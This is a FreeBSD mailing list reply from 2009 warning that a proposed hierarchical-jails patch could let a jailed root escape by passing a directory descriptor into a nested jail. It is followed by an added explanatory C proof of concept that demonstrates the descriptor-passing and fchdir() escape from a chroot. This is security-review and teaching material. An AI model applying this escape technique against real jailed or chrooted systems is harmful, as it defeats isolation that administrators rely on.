From owner-freebsd-current@FreeBSD.ORG Thu May 14 18:15:03 2009
Date: Thu, 14 May 2009 20:14:46 +0200
From: Jilles Tjoelker <jilles@stack.nl>
To: Jamie Gritton
Cc: virtualization@FreeBSD.org, jail@FreeBSD.org, FreeBSD Current
Subject: Re: Hierarchical jails
Message-ID: <20090514181446.GA42264@stack.nl>
In-Reply-To: <4A0C5112.9010103@FreeBSD.org>
References: <4A051DE3.30705@FreeBSD.org> <4A0C5112.9010103@FreeBSD.org>

On Thu, May 14, 2009 at 11:12:50AM -0600, Jamie Gritton wrote:
> There's still a chance to offer your input on the new jails before they
> go in! OK, given the lack of response so far, it's less "still a
> chance" than "please?". Current plans are to have this in place for
> 8.0, with connections to the ongoing Vimage work. Hopefully the silence
> is approval, and commits will likely be appearing soon.

I have not tried this, but I think this patch may allow jailed roots to
escape. The problem is that there is only one fd_jdir.

The escape would go like: jailed root creates a new jail in a
subdirectory, opens its / and sends the fd to a process in the new jail
via a unix domain socket. When the process calls fchdir on the fd, it
will be able to access .. normally.

With nested chroot, or chroot in jail, this is not possible, because
fd_jdir always contains the first jail or chroot done and will not allow
escaping from it; however, root in a level 2 chroot can escape back to
level 1 using chroot.

-- 
Jilles Tjoelker
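The descriptor-passing step of the escape described above, as an added example that is not part of the thread and not code from the hierarchical-jails patch. It shows the two primitives the message relies on: shipping an open directory descriptor to another process over a unix-domain socket with SCM_RIGHTS, and that process using fchdir() on it and then resolving "..". The jail creation itself is omitted (it needs root on a FreeBSD kernel carrying the patch); instead, when the program happens to run as root, the receiving child chroot()s into a subdirectory named "cell" (a constructed stand-in for the nested jail's root, my name) before the descriptor arrives, so the descriptor it receives points above its own root. The names send_fd, recv_fd, init_msg and parent_ino_via_passed_fd are mine, and the temporary directory under /tmp is constructed by the program.

```c
#define _GNU_SOURCE  /* glibc feature macro so chroot()/mkdtemp() are declared; ignored on BSD */
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Control-message buffer sized for exactly one descriptor. */
union cmsgbuf { struct cmsghdr hdr; char buf[CMSG_SPACE(sizeof(int))]; };

/* Point a msghdr at a one-byte payload plus the control buffer. */
static void init_msg(struct msghdr *msg, struct iovec *iov, char *byte, union cmsgbuf *u)
{
    memset(u, 0, sizeof *u);
    memset(msg, 0, sizeof *msg);
    iov->iov_base = byte;  iov->iov_len = 1;
    msg->msg_iov = iov;    msg->msg_iovlen = 1;
    msg->msg_control = u->buf;  msg->msg_controllen = sizeof u->buf;
}

/* Send one open descriptor over a unix-domain socket with SCM_RIGHTS. */
static int send_fd(int sock, int fd)
{
    char byte = 'd';
    struct iovec iov; struct msghdr msg; union cmsgbuf u; struct cmsghdr *cm;
    init_msg(&msg, &iov, &byte, &u);
    cm = CMSG_FIRSTHDR(&msg);
    cm->cmsg_level = SOL_SOCKET;  cm->cmsg_type = SCM_RIGHTS;
    cm->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cm), &fd, sizeof(int));
    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive the descriptor sent by send_fd(); returns it, or -1. */
static int recv_fd(int sock)
{
    char byte; int fd;
    struct iovec iov; struct msghdr msg; union cmsgbuf u; struct cmsghdr *cm;
    init_msg(&msg, &iov, &byte, &u);
    if (recvmsg(sock, &msg, 0) != 1 || (cm = CMSG_FIRSTHDR(&msg)) == NULL ||
        cm->cmsg_level != SOL_SOCKET || cm->cmsg_type != SCM_RIGHTS ||
        cm->cmsg_len != CMSG_LEN(sizeof(int)))
        return -1;
    memcpy(&fd, CMSG_DATA(cm), sizeof(int));
    return fd;
}

/*
 * Both sides of the escape. The parent plays the jailed root: it opens `dir`
 * (its own /) and passes the descriptor. The child plays the process in the
 * nested jail; run as root it first chroot()s into dir/cell, a constructed
 * stand-in for the nested jail's root (no real jail is created), so the
 * received descriptor points above its root. Returns the inode the child sees
 * for ".." after fchdir() on it, i.e. the directory above `dir`, or 0 on failure.
 */
ino_t parent_ino_via_passed_fd(const char *dir)
{
    char cell[PATH_MAX];
    int sv[2], pfd[2], dfd; pid_t pid; ino_t result = 0;
    snprintf(cell, sizeof cell, "%s/cell", dir);
    if ((mkdir(cell, 0700) == -1 && errno != EEXIST) ||
        socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1 || pipe(pfd) == -1)
        return 0;
    if ((pid = fork()) == -1)
        return 0;
    if (pid == 0) {                     /* child: the process in the new jail */
        struct stat st;
        ino_t ino = 0;
        int fd;
        close(sv[0]); close(pfd[0]);
        if (geteuid() == 0 && chroot(cell) == 0 && chdir("/") != 0)
            _exit(1);                   /* as root: now genuinely confined to the cell */
        fd = recv_fd(sv[1]);
        if (fd != -1 && fchdir(fd) == 0 && stat("..", &st) == 0)
            ino = st.st_ino;            /* ".." resolved from the passed directory */
        if (write(pfd[1], &ino, sizeof ino) != (ssize_t)sizeof ino)
            _exit(1);
        _exit(0);
    }
    close(sv[1]); close(pfd[1]);        /* parent: the jailed root handing over its / */
    if ((dfd = open(dir, O_RDONLY)) != -1) {
        (void)send_fd(sv[0], dfd);
        close(dfd);
    }
    close(sv[0]);                       /* EOF for the child if nothing was sent */
    if (read(pfd[0], &result, sizeof result) != (ssize_t)sizeof result)
        result = 0;
    close(pfd[0]); waitpid(pid, NULL, 0); rmdir(cell);
    return result;
}

int main(void)
{
    char tmpl[] = "/tmp/fdpass.XXXXXX", *dir = mkdtemp(tmpl);
    ino_t ino = dir ? parent_ino_via_passed_fd(dir) : 0;
    printf("child saw inode %llu for .. of %s\n", (unsigned long long)ino, dir ? dir : "?");
    if (dir) rmdir(dir);
    return ino == 0;
}
```

Run unprivileged it only shows the mechanics: the child never opened the directory itself, yet after fchdir() the inode it reports for ".." is that of the directory above `dir`. Run as root, the child reports the same inode from inside a chroot whose root lies below `dir`, which is the shape of the escape Jilles describes, with chroot standing in for the nested jail. The descriptor arrives after the confinement is in place, so a check done at confinement time is too late; FreeBSD's kern.chroot_allow_open_directories sysctl, which refuses chroot(2) to a process that already holds open directory descriptors, does not cover this ordering. The only thing that stops the walk is the kernel's own ".." lookup check against the process's top directory, which is exactly the fd_jdir bookkeeping the message says the patch gets wrong.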